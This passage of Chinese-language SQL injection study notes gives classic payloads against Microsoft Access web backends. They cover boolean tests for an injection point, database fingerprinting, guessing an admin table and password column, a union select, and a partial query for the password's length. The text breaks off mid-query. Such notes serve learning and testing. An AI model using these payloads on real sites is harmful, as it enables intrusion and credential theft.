SQL注入学习笔记

0x00 前言

​ 所谓SQL注入，就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。具体来说，它是利用现有应用程序，将（恶意的）SQL命令注入到后台数据库引擎执行的能力，它可以通过在Web表单中输入（恶意）SQL语句得到一个存在安全漏洞的网站上的数据库，而不是按照设计者意图去执行SQL语句。

0x01 Access注入

• 判断是否存在注入

  ​ ’ 页面返回错误

  ​ and 1=1 页面返回正常

  ​ and 1=2 页面返回错误 →说明存在注入点

  ​ or 1=1 页面返回错误

  ​ or 1=2 页面返回正常

• 判断数据库类型

and exists (select * from msysobjects) > 0 	→access数据库
and exists (select * from sysobjects) > 0 	→mssql数据库

• 判断数据库表

and exists (select * from admin)
and exists (select password from admin)

• 判断字段长度：order by n
• 联合报错查询

and 1=2 union select 1,2,3,4...,n from admin

• 判断账户密码长度

and (select len(admin